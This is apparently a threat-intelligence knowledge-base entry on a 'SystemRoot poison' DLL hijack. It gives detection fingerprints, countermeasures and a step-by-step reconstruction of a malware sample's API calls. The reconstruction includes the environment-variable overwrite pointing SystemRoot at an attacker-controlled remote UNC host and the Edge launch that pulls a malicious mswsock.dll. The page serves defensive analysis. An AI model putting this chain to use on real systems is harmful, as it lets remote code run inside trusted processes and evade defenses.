typetechniquecreated2026-08-09updated2026-08-09defense-evasionevasionmitre-attck

SystemRoot Poison DLL Hijack

Overview

A defense-evasion technique in which a stager overwrites the SystemRoot (and related windir / WINDIR) environment variables to point to an attacker-controlled UNC path before launching a signed Windows binary. When the target binary later loads a DLL via the standard search order, it resolves %SystemRoot%\system32\<target.dll> to the attacker’s remote share, loading and executing malicious code inside a trusted process context.

Detection / Fingerprint

  • PE imports SetEnvironmentVariableW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, and CreateProcessW from KERNEL32.dll only.
  • No .rsrc section (no icons, no manifest — typical for minimalist stagers).
  • Hardcoded paths to C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe or similar signed binaries.
  • Environment-variable names (SystemRoot, SYSTEMROOT, windir, WINDIR) appear as wide strings.
  • UNC path containing @SSL@<port> syntax for HTTPS WebDAV/SMB-over-SSL tunneling.

Implementation Patterns Observed

Sample f8ab87be57e4 demonstrates the full chain:

  1. SetEnvironmentVariableW(L"SystemRoot", L"\\\\mlyhbaa1h6.execute-api.eu-west-3.amazonaws.com@SSL@443\\cv")
  2. SetEnvironmentVariableW(L"SYSTEMROOT", …) — same value
  3. SetEnvironmentVariableW(L"windir", …) — same value
  4. SetEnvironmentVariableW(L"WINDIR", …) — same value
  5. GetFileAttributesW on both Edge install paths.
  6. ExpandEnvironmentStringsW(L"%TEMP%\\edge_sideload", …) for profile staging.
  7. Format command line: "<edge_path>" --no-first-run --no-default-browser-check --user-data-dir="%TEMP%\edge_sideload" --new-window https://pdfobject.com/pdf/sample.pdf
  8. CreateProcessW to launch Edge.

When Edge starts and initializes Winsock, the loader searches for mswsock.dll. The poisoned SystemRoot causes the search to hit \\mlyhbaa1h6.execute-api.eu-west-3.amazonaws.com@SSL@443\cv\system32\mswsock.dll, which the attacker serves as a malicious DLL.

Defensive Countermeasures

  • Block WebDAV UNC paths at the perimeter: Deny outbound SMB/WebDAV-over-HTTPS (@SSL@ syntax) to untrusted endpoints.
  • Monitor for SystemRoot modifications: EDR telemetry on SetEnvironmentVariableW with SystemRoot as the target, especially from non-system processes.
  • DLL load auditing: Enable Microsoft-Windows-DLL-Load/Audit events and alert on %SystemRoot% resolving to a UNC path.
  • Application control (WDAC/AppLocker): Block console PEs that launch Edge with --user-data-dir in %TEMP% from non-standard paths.

Pages Where Observed